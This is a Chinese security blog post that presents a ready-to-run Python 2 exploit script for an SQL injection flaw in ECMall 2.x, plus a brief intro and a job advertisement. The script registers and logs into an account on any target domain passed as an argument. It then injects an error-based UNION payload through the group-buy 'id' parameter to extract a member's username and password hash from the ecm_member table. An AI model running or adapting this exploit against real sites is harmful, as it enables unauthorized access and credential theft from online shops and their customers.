python编程:ecmall 2.x通杀SQL注入漏洞利用exp |

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

今天看到的这个漏洞 {ecmall 2.x通杀SQL注入},在公司现在主要做安全研究,写了份分析报告,漏洞分析都要写exp,exp顺便发到博客来,写的比较简单。

PS:公司还缺两个安全服务工程师,一个安全研究员。安全服务工程师的招聘信息看:http://www.cnseay.com/3440/

 

EXP:

 

#coding=utf-8
#author:Seay
#blog:www.cnseay.com
  
import HTMLParser  
import urlparse  
import urllib
import urllib2  
import cookielib  
import string  
import re
import sys
  
target = 'www.cnseay.com'
user_name = 'makelove'
password = 'onebyone'
email = '[email protected]'

def reguser():

    print('user register...')
    hosturl = 'http://' + target + '/index.php'

    posturl = 'http://' + target + '/index.php?app=member&act=register&ret_url='
  
 
    cj = cookielib.LWPCookieJar()  
    cookie_support = urllib2.HTTPCookieProcessor(cj)  
    opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)  
    urllib2.install_opener(opener)  
  
       
    h = urllib2.urlopen(hosturl)  
  
     
    headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',  
               'Content-Type' : 'application/x-www-form-urlencoded'}  
    
    postData = {'user_name' : user_name,  
                'password' : password,  
                'password_confirm' : password, 
                'email' : email, 
                'agree' : '1', 
                }  
  
   
    postData = urllib.urlencode(postData)  
    
    request = urllib2.Request(posturl, postData, headers)
    urllib2.urlopen(request)  
    

def login_exploit():

    print('user login...')
    hosturl = 'http://' + target + '/index.php' 
    
    posturl = 'http://' + target + '/index.php?app=member&act=login&synlogout=1'
  
    
    headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',  
               'Content-Type' : 'application/x-www-form-urlencoded'}  
 
    postData = {'user_name' : user_name,  
                'password' : password,  
                }  
  
    cj = cookielib.LWPCookieJar()  
    cookie_support = urllib2.HTTPCookieProcessor(cj)  
    opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)  
    urllib2.install_opener(opener)  

    postData = urllib.urlencode(postData)  

    request = urllib2.Request(posturl, postData, headers)
    
    response = urllib2.urlopen(request)  

    print('exploit...\n')
    url='http://'+target+'/index.php?app=buyer_groupbuy&act=exit_group&id='+urllib.quote('1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b')
    cookies = response.headers["Set-cookie"].split(";")[0]

    request = urllib2.Request(url) 
    request.add_header('Cookie', cookies)
    request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0')

    response = urllib2.urlopen(request)

    text = response.read() 
    response.close()

    prog = re.search("Duplicate entry '1(.*)' for key",text)
    try:
        print('Success:'+prog.groups()[0])
    except:
        print('Sorry,failed')


if __name__ == '__main__':
    if len(sys.argv)<2:
        print('argument error')
        print('example: '+sys.argv[0]+' domain')
        exit(0)
    target=sys.argv[1]
    reguser()
    login_exploit()

Tags:

ecmall漏洞, python编程,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
python编程:ecmall 2.x通杀SQL注入漏洞利用exp |